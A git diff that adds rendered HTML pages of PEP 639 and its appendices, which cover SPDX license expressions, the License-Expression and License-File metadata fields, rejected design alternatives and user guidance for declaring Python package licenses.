  • The classifiers License :: GUST Font License 1.0 and +License :: GUST Font License 2006-09-30 have no mapping to SPDX license +identifiers, and no PyPI package uses them as of 2022-07-09.
  • +
+

When multiple license classifiers are used, their relationship is ambiguous, and it is typically not possible to determine if all the licenses apply or if there is a choice among them. In this case, tools MUST NOT automatically infer a license expression, unless one license classifier is a parent of the other, i.e. the child contains all ::-delineated components of the parent, in which case tools MAY ignore the parent classifier but SHOULD issue an informative warning when doing so.
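The parent/child test described above amounts to a component-prefix check; a minimal sketch:

def is_parent_classifier(parent, child):
    """True if ``child`` contains all ::-delineated components of ``parent``."""
    parent_parts = [part.strip() for part in parent.split("::")]
    child_parts = [part.strip() for part in child.split("::")]
    return (len(child_parts) > len(parent_parts)
            and child_parts[:len(parent_parts)] == parent_parts)

# The parent classifier may then be ignored, with a warning:
assert is_parent_classifier("License :: OSI Approved",
                            "License :: OSI Approved :: MIT License")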

+
+ +
+ +
\ No newline at end of file
diff --git a/pep-0639/appendix-rejected-ideas/index.html b/pep-0639/appendix-rejected-ideas/index.html
new file mode 100644
index 00000000000..fd689a45a98
--- /dev/null
+++ b/pep-0639/appendix-rejected-ideas/index.html

Appendix: Rejected Ideas | peps.python.org
+
+


+ + +
+
+
+

Appendix: Rejected Ideas

+
+

Abstract

+

This document contains a list of alternatives to the ideas proposed in PEP 639, with detailed explanations of why they were rejected.

+
+
+

Core Metadata fields

+

Potential alternatives to the structure, content and deprecation of the +Core Metadata fields specified in PEP 639.

+
+

Re-use the License field

+

Following initial discussion, earlier versions of +PEP 639 proposed re-using the existing License field, which tools would +attempt to parse as a SPDX license expression with a fallback to free text. +Initially, this would cause a warning and eventually it would be treated as an +error.

+

This would have been more backwards-compatible, allowed a smoother adoption of SPDX license expressions in the community, and avoided adding yet another license-related field.

+

Eventually, consensus was reached that a +dedicated License-Expression field was a better approach. +The presence of this field unambiguously signals support for the SPDX +identifiers, without the need for complex heuristics, and allows tools to +easily detect invalid content.

+

Furthermore, it allows both the existing License field and +the license classifiers to be easily deprecated, +with tools able to distinguish between packages conforming to PEP 639 or not, +and adapt their behavior accordingly.

+

Finally, it avoids changing the behavior of an existing metadata field, +and avoids tools having to guess the Metadata-Version and field behavior +based on its value rather than merely its presence.

+

Distributions which already contain valid SPDX license expressions in the License field will not automatically be recognized as such. The migration is simple, though, and PEP 639 provides guidance on how it can be performed automatically by tooling.

+
+
+

Re-Use the License field with a value prefix

+

As an alternative to the previous idea, prefixing SPDX license expressions with, e.g., spdx: was suggested to reduce the ambiguity of re-using the License field. However, this effectively amounted to creating a field within a field, and didn’t address the downsides of keeping the License field. Namely, it still changes the behavior of an existing metadata field, requires tools to parse its value to determine how to handle its content, and makes the specification and deprecation process more complex and less clean.

+

Projects currently using valid SPDX identifiers in the License field wouldn’t be automatically recognized, and fixing them would require about the same amount of effort as introducing a new field, namely changing a line in the project’s source metadata. Therefore, it was rejected in favor of a new field.

+
+
+

Don’t make License-Expression mutually exclusive

+

For backwards compatibility, the License field and/or the license classifiers could still be allowed together with the new License-Expression field, presumably with a warning. However, this could easily lead to inconsistent license metadata in no fewer than three different fields, which is contrary to PEP 639’s goal of making the licensing story unambiguous. Therefore, with community consensus, this idea was rejected.

+
+
+

Don’t deprecate existing License field and classifiers

+

Several community members were concerned that deprecating the +existing License field and classifiers would result in +much churn for package authors and raise the barrier to +entry for new ones, particularly developers seeking to +package their personal projects without caring +too much about the legal technicalities. +Indeed, every deprecation should be carefully considered relative to the +long-term +net benefit. At the minimum, this change shouldn’t make it more +difficult for a Python developer to share their work under +a license of their choice, and ideally improve the situation.

+

Following many rounds of discussion, +the general consensus was in favor of deprecating the legacy +means of specifying a license and in favor of “one obvious way to do it”. +Not doing so would leave three different un-deprecated ways of +specifying a license for a package, two of them ambiguous, +inconsistently documented and out of date. +This is more complex for tools to support +indefinitely, resulting in a non-trivial maintenance cost.

+

Finally, for unmaintained packages, those using tools supporting older +metadata versions, or those who choose not to provide license metadata, +no changes are required regardless of the deprecation.

+
+
+

Don’t mandate validating new fields on PyPI

+

Previously, PEP 639 did not provide specific guidance for PyPI (or other package indices) as to whether and how they should validate the License-Expression or License-File fields, nor how they should handle using them in combination with the deprecated License field or license classifiers. This simplified the specification and deferred implementation on PyPI to a later PEP, to minimize disruption to package authors.

+

This was in place for an earlier draft of PEP 639 which didn’t separate License-Expression from the License field. The validation would have been difficult and backwards-incompatible, breaking existing packages. With the current proposal, there was a clear consensus that the new field should be validated from the start, guaranteeing that all distributions uploaded to PyPI that declare Core Metadata version 2.4 or higher and have the License-Expression field will have a valid expression, which PyPI and the consumers of its packages and metadata can rely on as following the specification here.

+

The same can be extended to the new License-File field as well, +to ensure that it is valid and the legally required license files are +present. To be clear, this would not require that any uploaded distribution +have such metadata, only that if they choose to declare it per the +specification in PEP 639, it is assured to be valid.

+
+
+
+

Source metadata license key

+

Alternative possibilities related to the license key in the +pyproject.toml project source metadata.

+
+

Add new subkeys to table

+

There were proposals to add various subkeys to the table. Combining different types of metadata that require different handling, adding new guidance regarding the subkeys’ mutual exclusivity, and allowing some of them to be defined as dynamic would make the transition harder and create more confusion rather than clarity for users. This approach was rejected in favour of a flatter pyproject.toml design, a clear mapping between pyproject.toml keys and Core Metadata fields, and the increased readability of separate keys.

+

Rejected proposals:

+
    +
  • add expression and files subkeys to table
  • +
  • add an expression subkey instead of a string value
  • +
  • add a type key to treat text as expression
  • +
+
+
+

Define a new top-level license-expression key

+

An earlier version of PEP 639 defined a new, top-level license-expression +under the [project] table, +rather than using the string value of the license key. +This was seen as clearer for readers and writers, +in line with the goals of PEP 639.

+

While differences from existing tool formats (and Core Metadata +field names) have precedent in PEP 621, repurposing an existing key to mean +something different (and map to a different Core Metadata field), +with distinct and incompatible syntax does not, +and could cause ambiguity for readers and authors.

+

Also, per the project source metadata spec, this would allow separately marking the [project] keys corresponding to the License and License-Expression metadata fields as dynamic, avoiding a potential concern with back-filling the License field from the License-Expression field, as PEP 639 currently allows, without marking license as dynamic (which would not be possible, since they both map to the same top-level key).

+

However, community consensus favored using +the top-level string value of the existing license key, +as reserved for this purpose by PEP 621:

+
+
A practical string value for the license key has been purposefully left +out to allow for a future PEP to specify support for SPDX expressions +(the same logic applies to any sort of “type” field specifying what +license the file or text represents).
+

This is simpler for users to remember and type, +avoids adding a new top-level key while taking advantage of an existing one, +guides users toward using a license expression as the default, +and follows what was envisioned in the original PEP 621.

+

Additionally, this allows cleanly deprecating the table values +without deprecating the key itself, +and makes them mutually exclusive without users having to remember +and tools having to enforce it.

+

Finally, consistency with other tool formats and the underlying Core Metadata was not a sufficient priority to override the advantages of using the existing key. The dynamic concerns were mostly mitigated by not specifying legacy license to license expression conversion at build time, by explicitly specifying back-filling of the License field when not dynamic, and by the fact that the two fields are mutually exclusive, so there is little practical need to distinguish which is dynamic.

+

Therefore, a top-level string value for license was adopted for PEP 639, +as an earlier working draft had temporarily specified.

+
+
+
+

Source metadata license-files key

+

Alternatives considered for the license-files key in the +pyproject.toml [project] table, primarily related to the +path/glob type handling.

+
+

Define mutually exclusive paths and globs subkeys to license-files

+

A previous draft of the PEP specified mutually exclusive paths and +globs subkeys of the license-files [project] table key. +This was proposed to achieve the maximum clarity of the defined values for +both users and tools. +Allowing license files to be specified as literal paths would avoid edge cases, +such as those containing glob characters +(or those confusingly similar to them, as described in PEP 672).

+

However, this approach introduces an extra level of nesting, of the very kind that PEP 639 removes from the license key. It creates more burden on project authors, who need to disambiguate between the two approaches and choose one to specify the location of their license files. It was also pointed out that users could easily, but incorrectly, assume that paths also supports globs.

+

Therefore, it was decided against this approach in favor of a flat array value, which simplifies the specification and implementation and more closely matches the configuration format of existing tools. The PEP recommends using only alphanumeric characters and the dot (.) in filenames, to avoid confusion when interpreting glob patterns.

+
+
+

Only accept verbatim paths

+

Globs could be disallowed as values to the license-files +key in pyproject.toml and only verbatim paths allowed. +This would ensure that all license files are explicitly specified, +found and included, and the source metadata +is completely static in the strictest sense of the term, without tools +having to inspect the rest of the project source files to determine exactly +what license files will be included and what the License-File values +will be. This would also simplify the spec and tool implementation.

+

However, practicality beats purity here. Globs are already supported by many existing tools, and explicitly specifying the full path to every license file would be unnecessarily tedious for complex projects with vendored dependencies. More critically, it would make it much easier to accidentally miss a required legal file, rendering the package illegal to distribute.

+

Tools can still determine the files to be included, +based only on the glob patterns the user specified and the +filenames in the package, without installing it, executing its code or even +examining its files. +And, of course, sdists, wheels and others will have the full static list +of files specified in their distribution metadata.
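As a sketch of this point, the matching requires only the patterns and a list of names, here using fnmatch from the standard library (a conforming tool would implement the PEP’s exact glob rules, which differ slightly):

import fnmatch

def match_license_files(file_names, patterns):
    """Statically resolve patterns against a known file listing, without
    executing project code or reading file contents."""
    # NB: fnmatch's * also crosses '/', unlike the PEP's glob rules.
    matched = set()
    for pattern in patterns:
        matched.update(fnmatch.filter(file_names, pattern))
    return sorted(matched)

# Hypothetical sdist listing:
names = ["LICENSE.txt", "_vendor/packaging/LICENSE.APACHE", "src/pkg/__init__.py"]
match_license_files(names, ["LICENSE*", "_vendor/packaging/LICENSE*"])
# -> ['LICENSE.txt', '_vendor/packaging/LICENSE.APACHE']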

+
+
+

Use a default value for license-files if not specified

+

A previous draft of the PEP proposed a default value for detecting license files in case the user has not declared any and has not marked the key as dynamic. That value was defined as an array of globs: ["LICEN[CS]E*", "COPYING*", "NOTICE*", "AUTHORS*"]

+

However, this would create an exception among the existing metadata, as no other key has implicit defaults defined. Implicit values in pyproject.toml keys are delegated to the dynamic field, which is specified as being calculated. Also, the values were chosen arbitrarily, without a strong justification for why they should constitute a standard.

+
+
+

Must be marked dynamic to use defaults

+

With a restrictive interpretation of PEP 621’s description of the dynamic list, it may seem sensible to require the license-files key to be marked as dynamic for the default glob patterns to be used, or alternatively for license files to be matched and included at all.

+

However, this is just declaring a static, strictly-specified default value, +required to be used exactly by all conforming tools, similarly to any other set +of glob patterns the user themself may specify. +The resulting License-File Core Metadata values +can be determined through inspecting a list of files in the source, without +executing code, or even inspecting file contents.

+

Moreover, even if this were not so, this interpretation would be backwards-incompatible with the existing format and inconsistent with the behavior of existing tools. Further, this would create a serious risk of a large number of projects unknowingly no longer including legally mandatory license files, and is thus not a sane default.

+

Finally, not defining the default as dynamic allows authors to unambiguously +indicate when their build/packaging tools are going to be +handling the inclusion of license files themselves; +to do otherwise would defeat the purpose of the dynamic list.

+
+
+
+

License file paths

+

Alternatives related to the paths and locations of license files in the source +and built distributions.

+
+

Flatten license files in subdirectories

+

Previous drafts of PEP 639 didn’t specify how to handle the license files +in subdirectories. Currently, the Wheel and +Setuptools projects flatten all license files +into the .dist-info directory without preserving the source subdirectory +hierarchy.

+

While this approach matches existing ad hoc practice, it can result in name conflicts, with license files clobbering one another, no defined behavior for resolving them, and the package left legally un-distributable without any clear indication that the specified license files have not been included.

+

Furthermore, this leads to inconsistent relative file paths for non-root +license files between the source, sdist and wheel, and prevents the paths +given in the “static” [project] table metadata from being truly static. +Finally, the source directory structure often holds valuable information +about what the licenses apply to, +which is lost when flattening them and far from trivial to reconstruct.

+

To resolve this, the PEP now proposes reproducing the source directory structure of the original license files inside the .dist-info directory. The only downside of this approach is a more nested .dist-info directory. The following proposal, rooting the license files under a licenses subdirectory, eliminates both the name collisions and the clutter problem entirely.

+
+
+

Resolve name conflicts differently

+

Rather than preserving the source directory structure for license files +inside the .dist-info directory, we could specify some other mechanism +for conflict resolution, such as pre- or appending the parent directory name +to the license filename, traversing up the tree until the name was unique, +to avoid excessively nested directories.

+

However, this would not address the path consistency issues, would require +much more discussion and further complicate +the specification. Therefore, it was rejected in +favor of the more obvious solution of just preserving the +source subdirectory layout, as many stakeholders have advocated for.

+
+
+

Dump directly in .dist-info

+

Previously, the included license files were stored directly in the top-level +.dist-info directory of built wheels and installed projects.

+

However, this leads to a more cluttered .dist-info directory, as opposed to separating licenses into their own namespace. There is still a risk of custom license filenames colliding with the standard metadata files (e.g. RECORD, METADATA) in the .dist-info directory, which would require limiting the potential filenames used. Finally, putting licenses into their own specified subdirectory allows humans and tools to correctly manipulate all of them at once (such as in distro packaging, legal checks, etc.) without having to reference each of their paths from the Core Metadata.

+

Therefore, the simplest and most obvious solution, as suggested by several +on the Wheel +and Setuptools implementation issues, is to root the license files +relative to a licenses subdirectory of .dist-info. This is simple +to implement and solves all the problems noted here, without significant +drawbacks relative to other more complex options.

+

It does make the specification a bit more complex, but implementation should remain equally simple. It does mean that wheels produced following this change will have differently-located licenses than those produced before it, but as this was already true for license files in subdirectories, and as until PEP 639 there was no way of accessing these files programmatically, this should not pose significant problems in practice.
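The resulting path mapping is mechanical; a minimal sketch (the distribution name is hypothetical):

from pathlib import PurePosixPath

def wheel_license_path(distinfo, relative_source_path):
    """Root a license file, with its source structure preserved, under the
    licenses subdirectory of .dist-info."""
    return str(PurePosixPath(distinfo, "licenses", relative_source_path))

wheel_license_path("pkg-1.0.dist-info", "_vendor/packaging/LICENSE.APACHE")
# -> 'pkg-1.0.dist-info/licenses/_vendor/packaging/LICENSE.APACHE'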

+
+
+

Add new licenses category to wheel

+

Instead of defining a root license directory (licenses) inside +the Core Metadata directory (.dist-info) for wheels, we could instead +define a new category (and, presumably, a corresponding install scheme), +similar to the others currently included under .data in the wheel archive, +specifically for license files, called (e.g.) licenses. This was mentioned +by the wheel creator, and would allow installing licenses somewhere more +platform-appropriate and flexible than just the .dist-info directory +in the site path.

+

However, at present, PEP 639 does not implement this idea, and it is deferred to a future one. It would add significant complexity and friction to PEP 639, which is primarily concerned with standardizing existing practice and updating the Core Metadata specification. Furthermore, doing so could require modifying sysconfig and the install schemes specified therein, alongside Wheel, Installer and other tools, which would be a non-trivial undertaking. While potentially slightly more complex for repackagers, the current proposal still ensures all license files are included in a single dedicated directory, and thus should still greatly improve the status quo in this regard.

+

In addition, this approach is not fully backwards compatible (since it +isn’t transparent to tools that simply extract the wheel), is a greater +departure from existing practice and would lead to more inconsistent +license install locations from wheels of different versions. Finally, +this would mean licenses would not be installed as close to their +associated code, there would be more variability in the license root path +across platforms and between built distributions and installed projects, +accessing installed licenses programmatically would be more difficult, and a +suitable install location and method would need to be created that would avoid +name clashes.

+

Therefore, to keep PEP 639 in scope, the current approach was retained.

+
+
+

Name the subdirectory license_files

+

Both licenses and license_files have been suggested as potential +names for the root license directory inside .dist-info of wheels and +installed projects. An initial draft of the PEP specified the former +due to being slightly clearer and consistent with the +name of the Core Metadata field (License-File) +and the [project] table key (license-files). +However, the current version of the PEP adopts the licenses name, +due to a general preference by the community for its shorter length +and the lack of a separator character.

+
+
+
+

Other ideas

+

Miscellaneous proposals, possibilities and discussion points that were +ultimately not adopted.

+
+

Map identifiers to license files

+

This would require using a mapping, which would add extra complexity to how licenses are documented and introduce an additional nesting level.

+

A mapping would be needed, as it cannot be guaranteed that every expression (key) has exactly one license file associated with it: a GPL with an exception may be in a single file, while an Apache license’s LICENSE and its NOTICE file are two distinct files. For most common cases, a single license expression and one or more license files would be perfectly adequate. In the rarer and more complex cases where many licenses are involved, authors can still safely use the fields specified here, just with a slight loss of clarity by not specifying which text file(s) map to which license identifier (though each license identifier has a corresponding SPDX-registered full license text), while not forcing the more complex mapping on the large majority of users who do not need or want it.

+

We could, of course, have a data field with multiple possible value types, but this could be a source of confusion. This is what has been done, for instance, in npm (historically) and in Rubygems (still today); as a result, tools need to test the type of the metadata field before using it in code, while users are confused about when to use a list or a string. Therefore, this approach is rejected.

+
+
+

Map identifiers to source files

+

As discussed previously, file-level notices are out of scope for PEP 639, +and the existing SPDX-License-Identifier convention can +already be used if this is needed without further specification here.

+
+
+

Don’t freeze compatibility with a specific SPDX version

+

PEP 639 could omit specifying a specific SPDX specification version, +or one for the list of valid license identifiers, which would allow +more flexible updates as the specification evolves.

+

However, serious concerns were expressed about a future SPDX update breaking +compatibility with existing expressions and identifiers, leaving current +packages with invalid metadata per the definition in PEP 639. Requiring +compatibility with a specific version of these specifications here +and a PEP or similar process to update it avoids this contingency, +and follows the practice of other packaging ecosystems.

+

Therefore, it was decided to specify a minimum version and require tools to be compatible with it, while still allowing updates so long as they don’t break backward compatibility. This enables tools to immediately take advantage of improvements and accept new licenses, balancing flexibility and compatibility.

+
+
+

Don’t allow custom license identifiers

+

A previous draft of this PEP allowed only two custom identifiers: LicenseRef-Public-Domain and LicenseRef-Proprietary, to handle the cases where projects have a license for which there is no recognized SPDX license identifier. The concern was that custom identifiers cannot be checked for correctness, and that users may think they always have to prefix identifiers with LicenseRef-, which would lead to tools producing invalid metadata.

+

However, Python packages are produced in many open and closed environments, where it may be impossible to declare the license using only the small subset of allowed custom identifiers and where, for various reasons, it’s not possible to add the license to the SPDX license list.

+

Custom license identifiers are explicitly allowed and described in the official SPDX specification, and they can be syntactically validated, although not case-normalized.

+

Therefore, with acknowledgement that the custom identifiers can’t be fully +validated and may contain mistakes, it was decided to allow +them in line with the official SPDX specification.

+
+
+

Different licenses for source and binary distributions

+

As an additional use case, it was asked whether it was in scope for +PEP 639 to handle cases where the license expression for a binary distribution +(wheel) is different from that for a source distribution (sdist), such +as in cases of non-pure-Python packages that compile and bundle binaries +under different licenses than the project itself. An example cited was +PyTorch, which contains CUDA from Nvidia, which is freely +distributable but not open source.

+

However, given the inherent complexity here, the lack of an obvious mechanism to do so, the fact that each wheel would need its own license information, the lack of support on PyPI for exposing license info on a per-distribution-archive basis, and the relatively niche use case, it was determined to be out of scope for PEP 639, and left to a future PEP to resolve if sufficient need and interest exists and an appropriate mechanism can be found.

+
+
+
+ +
+ +
\ No newline at end of file
diff --git a/pep-0639/appendix-user-scenarios/index.html b/pep-0639/appendix-user-scenarios/index.html
new file mode 100644
index 00000000000..1de744955ba
--- /dev/null
+++ b/pep-0639/appendix-user-scenarios/index.html

Appendix: User Scenarios | peps.python.org
+
+


+ + +
+
+
+

Appendix: User Scenarios

+
+

Abstract

+

This document contains guidance on applying PEP 639 in real-life user scenarios.

+
+
+

User Scenarios

+

The following covers the range of common use cases from a user perspective, +providing guidance for each. Do note that the following +should not be considered legal advice, and readers should consult a +licensed legal practitioner in their jurisdiction if they are unsure about +the specifics for their situation.

+
+

I have a private package that won’t be distributed

+

If your package isn’t shared publicly, i.e. outside your company, +organization or household, it usually isn’t strictly necessary to include +a formal license, so you wouldn’t necessarily have to do anything extra here.

+

However, it is still a good idea to include LicenseRef-Proprietary +as a license expression in your package configuration, and/or a +copyright statement and any legal notices in a LICENSE.txt file +in the root of your project directory, which will be automatically +included by packaging tools.

+
+ +
+

I want to distribute my project under a specific license

+

To use a particular license, simply paste its text into a LICENSE.txt +file at the root of your repo, if you don’t have it in a file starting with +LICENSE or COPYING already, and add +license = "LICENSE-ID" under [project] in your +pyproject.toml if your packaging tool supports it, or else in its +config file. You can find the LICENSE-ID +and copyable license text on sites like +ChooseALicense or SPDX.

+

Many popular code hosts, project templates and packaging tools can add the +license file for you, and may support the expression as well in the future.

+
+
+

I maintain an existing package that’s already licensed

+

If you already have license files and metadata in your project, you +should only need to make a couple of tweaks to take advantage of the new +functionality.

+

In your project config file, enter your license expression under license (the [project] table in pyproject.toml), or the equivalent for your packaging tool, and make sure to remove any legacy license table subkeys or License :: classifiers. Your existing license value may already be valid as one (e.g. MIT, Apache-2.0 OR BSD-2-Clause, etc.); otherwise, check the SPDX license list for the identifier that matches the license used in your project.

+

Make sure to list your license files under license-files under [project] in pyproject.toml, or else in your tool’s configuration file.

+

See the Basic example for a simple but complete real-world demo of how this works in practice. Packaging tools may support automatically converting legacy licensing metadata; check your tool’s documentation for more information.

+
+
+

My package includes other code under different licenses

+

If your project includes code from others covered by different licenses, +such as vendored dependencies or files copied from other open source +software, you can construct a license expression +to describe the licenses involved and the relationship +between them.

+

In short, License-1 AND License-2 means that both licenses apply to your project, or parts of it (for example, you included a file under another license), and License-1 OR License-2 means that either of the licenses can be used, at the user’s option (for example, you want to allow users a choice of multiple licenses). You can use parentheses (()) for grouping to form expressions that cover even the most complex situations.

+

In your project config file, enter your license expression under +license ([project] table of pyproject.toml), +or the equivalent for your packaging tool, +and make sure to remove any legacy license table subkeys +or License :: classifiers.

+

Also, make sure you add the full license text of all the licenses as files somewhere in your project repository. List the relative paths or glob patterns to each of them under license-files under [project] in pyproject.toml (if your tool supports it), or else in your tool’s configuration file.

+

As an example, if your project was licensed MIT but incorporated a vendored dependency (say, packaging) that was licensed under either Apache 2.0 or the 2-clause BSD, your license expression would be MIT AND (Apache-2.0 OR BSD-2-Clause). You might have a LICENSE.txt in your repo root, and a LICENSE-APACHE.txt and LICENSE-BSD.txt in the _vendor/packaging subdirectory, so to include all of them, you’d specify ["LICENSE.txt", "_vendor/packaging/LICENSE*"] as glob patterns, or ["LICENSE.txt", "_vendor/packaging/LICENSE-APACHE.txt", "_vendor/packaging/LICENSE-BSD.txt"] as literal file paths.

+

See a fully worked out Advanced example for an end-to-end +application of this to a real-world complex project, with many technical +details, and consult a tutorial for more help and examples +using SPDX identifiers and expressions.

+
+
+
+ +
+ +
\ No newline at end of file
diff --git a/pep-0639/index.html b/pep-0639/index.html
new file mode 100644
index 00000000000..59d19dd8575
--- /dev/null
+++ b/pep-0639/index.html

PEP 639 – Improving License Clarity with Better Package Metadata | peps.python.org
+
+


+ + +
+
+
+

PEP 639 – Improving License Clarity with Better Package Metadata

+
+
Author:
+
Philippe Ombredanne <pombredanne at nexb.com>, +C.A.M. Gerlach <CAM.Gerlach at Gerlach.CAM>, +Karolina Surma <karolina.surma at gazeta.pl>
+
PEP-Delegate:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Provisional
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
15-Aug-2019
+
Post-History:
+
15-Aug-2019, +17-Dec-2021, +10-May-2024
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Provisional Acceptance

+

This PEP has been provisionally accepted, +with the following required conditions before the PEP is made Final:

+
    +
  1. An implementation of the PEP in two build back-ends.
  2. An implementation of the PEP in PyPI.
+
+
+

Abstract

+

This PEP defines a specification for how licenses are documented in Python projects.

+

To achieve that, it:
  • adopts the SPDX license expression syntax as a means of expressing the license of a distribution;
  • defines a new License-Expression Core Metadata field, with a corresponding top-level string value for the license key in the pyproject.toml [project] table;
  • defines a new License-File Core Metadata field, with a corresponding license-files key in the pyproject.toml [project] table;
  • deprecates the legacy License field and the license classifiers.

+ +

This will make license declaration simpler and less ambiguous for +package authors to create, end users to understand, +and tools to programmatically process.

+

The changes will update the +Core Metadata specification to version 2.4.

+
+
+

Goals

+

This PEP’s scope is limited to covering new mechanisms for documenting the license of a distribution package, specifically defining:
  • how the license of a distribution is to be expressed, via the License-Expression field and the license key;
  • how license files are to be included in distributions, via the License-File field and the license-files key.

+ +

The changes that this PEP requires have been designed to minimize impact and +maximize backward compatibility.

+
+
+

Non-Goals

+

This PEP doesn’t recommend any particular license to be chosen by any +particular package author.

+

If projects decide not to use the new fields, no additional restrictions are +imposed by this PEP when uploading to PyPI.

+

This PEP also is not about license documentation for individual files, +though this is a surveyed topic +in an appendix, nor does it intend to cover cases where the +source distribution and +binary distribution packages don’t have +the same licenses.

+
+
+

Motivation

+

Software must be licensed in order for anyone other than its creator to +download, use, share and modify it. +Today, there are multiple fields where licenses +are documented in Core Metadata, +and there are limitations to what can be expressed in each of them. +This often leads to confusion both for package authors +and end users, including distribution re-packagers.

+

This has triggered a number of license-related discussions and issues, +including on outdated and ambiguous PyPI classifiers, +license interoperability with other ecosystems, +too many confusing license metadata options, +limited support for license files in the Wheel project, and +the lack of precise license metadata.

+

As a result, on average, Python packages tend to have more ambiguous and +missing license information than other common ecosystems. This is supported by +the statistics page of the +ClearlyDefined project, an +Open Source Initiative effort to help +improve licensing clarity of other FOSS projects, covering all packages +from PyPI, Maven, npm and Rubygems.

+

The current license classifiers could be extended to include the full range of +the SPDX identifiers while deprecating the ambiguous classifiers +(such as License :: OSI Approved :: BSD License).

+

However, there are multiple arguments against such an approach:

+
    +
  • It requires a great effort to duplicate the SPDX license list and keep it in +sync.
  • +
  • It is a hard break in backward compatibility, forcing package authors +to update to new classifiers immediately when PyPI deprecates the old ones.
  • +
  • It only covers packages under a single license; it doesn’t address projects that vendor dependencies (e.g. Setuptools), offer a choice of licenses (e.g. Packaging), were relicensed, adapt code from other projects, or contain fonts, images, examples, binaries or other assets under other licenses.
  • +
  • It requires that both authors and tools understand and implement the PyPI-specific classifier system.
  • +
  • It does not provide as clear an indicator that a package +has adopted the new system, and should be treated accordingly.
  • +
+
+
+

Rationale

+

A survey was conducted to map the existing license metadata +definitions in the Python ecosystem and a +variety of other packaging systems, Linux distributions, +language ecosystems and applications.

+

The takeaways from the survey have guided the recommendations of this PEP:

+
    +
  • SPDX and SPDX-like syntaxes are the most popular license expressions +in many modern package systems.
  • +
  • Most Free and Open Source Software licenses require package authors to +include their full text in a Distribution Package.
  • +
+

Therefore, this PEP introduces two new Core Metadata fields:

+
    +
  • License-Expression that +provides an unambiguous way to express the license of a package +using SPDX license expressions.
  • +
  • License-File that +offers a standardized way to include the full text of the license(s) +with the package when distributed, +and allows other tools consuming the Core Metadata +to locate a distribution archive’s license files.
  • +
+

Furthermore, this specification builds upon +existing practice in the Setuptools and +Wheel projects. +An up-to-date version of the current draft of this PEP is +implemented in the +Hatch packaging tool, and an earlier draft of the +license files portion +is implemented in Setuptools.

+
+
+

Terminology

+

The keywords “MUST”, “MUST NOT”, “REQUIRED”, +“SHOULD”, “SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” +in this document are to be interpreted as described in RFC 2119.

+
+

License terms

+

The license-related terminology draws heavily from the SPDX Project, +particularly license identifier and license expression.

+
+
license classifier
A PyPI Trove classifier +(as described +in the Core Metadata specification) +which begins with License ::.
+
license expression
SPDX expression
A string with valid SPDX license expression syntax +including one or more SPDX license identifier(s), +which describes a Project’s license(s) +and how they inter-relate. +Examples: +GPL-3.0-or-later, +MIT AND (Apache-2.0 OR BSD-2-clause)
+
license identifier
SPDX identifier
A valid SPDX short-form license identifier, +as described in the +Add License-Expression field section of this PEP. +This includes all valid SPDX identifiers and +the custom LicenseRef-[idstring] strings conforming to the +SPDX specification, clause 10.1. +Examples: +MIT, +GPL-3.0-only, +LicenseRef-My-Custom-License
+
root license directory
license directory
The directory under which license files are stored in a +project source tree, distribution archive +or installed project. +Also, the root directory that their paths +recorded in the License-File +Core Metadata field are relative to. +Defined to be the project root directory +for a project source tree or +source distribution; +and a subdirectory named licenses of +the directory containing the built metadata— +i.e., the .dist-info/licenses directory— +for a Built Distribution or installed project.
+
+
+
+
+

Specification

+

The changes necessary to implement this PEP include:
  • the adoption of the SPDX license expression syntax, as specified below;
  • the Core Metadata changes: the new License-Expression and License-File fields, and the deprecation of the License field and the license classifiers;
  • the project source metadata changes: the new string value of the license key and the new license-files key in the [project] table of pyproject.toml;
  • the handling of license files in project source trees, source distributions (sdists), built distributions (wheels) and installed projects.

+ +

Note that the guidance on errors and warnings is for tools’ default behavior; +they MAY operate more strictly if users explicitly configure them to do so, +such as by a CLI flag or a configuration option.

+
+

SPDX license expression syntax

+

This PEP adopts the SPDX license expression syntax as +documented in the SPDX specification, either +Version 2.2 or a later compatible version.

+

A license expression can use the following license identifiers:

+
    +
  • Any SPDX-listed license short-form identifiers that are published in the +SPDX License List, version 3.17 or any later compatible +version. Note that the SPDX working group never removes any license +identifiers; instead, they may choose to mark an identifier as “deprecated”.
  • +
  • The custom LicenseRef-[idstring] string(s), where +[idstring] is a unique string containing letters, numbers, +. and/or -, to identify licenses that are not included in the SPDX +license list. The custom identifiers must follow the SPDX specification, +clause 10.1 of the given specification version.
  • +
+

Examples of valid SPDX expressions:

+
MIT
BSD-3-Clause
MIT AND (Apache-2.0 OR BSD-2-Clause)
MIT OR GPL-2.0-or-later OR (FSFUL AND BSD-2-Clause)
GPL-3.0-only WITH Classpath-Exception-2.0 OR BSD-3-Clause
LicenseRef-Special-License OR CC0-1.0 OR Unlicense
LicenseRef-Proprietary
+
+
+

Examples of invalid SPDX expressions:

+
Use-it-after-midnight
Apache-2.0 OR 2-BSD-Clause
LicenseRef-License with spaces
LicenseRef-License_with_underscores
+
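For illustration only, the following is a loose structural check of the expression syntax, with a tiny stand-in for the SPDX license list; real tools typically delegate to a full SPDX parser (for example, the license-expression library) rather than implementing the grammar themselves:

import re

# Tiny illustrative stand-in for the SPDX license (and exception) lists.
KNOWN_IDS = {"MIT", "BSD-2-Clause", "BSD-3-Clause", "Apache-2.0",
             "GPL-3.0-only", "Classpath-exception-2.0", "CC0-1.0", "Unlicense"}
LICENSE_REF = re.compile(r"^LicenseRef-[A-Za-z0-9.\-]+$")  # SPDX clause 10.1

def is_valid_identifier(token):
    return token in KNOWN_IDS or bool(LICENSE_REF.match(token))

def looks_like_valid_expression(expression):
    """Loose structural check: identifiers joined by AND/OR/WITH, with
    balanced parentheses.  Not a full parser; e.g. it does not enforce
    that WITH is followed by an exception identifier."""
    depth, expect_operand = 0, True
    for token in expression.replace("(", " ( ").replace(")", " ) ").split():
        if token == "(":
            if not expect_operand:
                return False
            depth += 1
        elif token == ")":
            if expect_operand or depth == 0:
                return False
            depth -= 1
        elif token in ("AND", "OR", "WITH"):
            if expect_operand:
                return False
            expect_operand = True
        elif is_valid_identifier(token):
            if not expect_operand:
                return False
            expect_operand = False
        else:
            return False
    return depth == 0 and not expect_operand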
+
+
+
+

Core Metadata

+

The error and warning guidance in this section applies to build and +publishing tools; end-user-facing install tools MAY be less strict than +mentioned here when encountering malformed metadata +that does not conform to this specification.

+

As it adds new fields, this PEP updates the Core Metadata version to 2.4.

+
+

Add License-Expression field

+

The License-Expression optional Core Metadata field +is specified to contain a text string +that is a valid SPDX license expression, +as defined above.

+

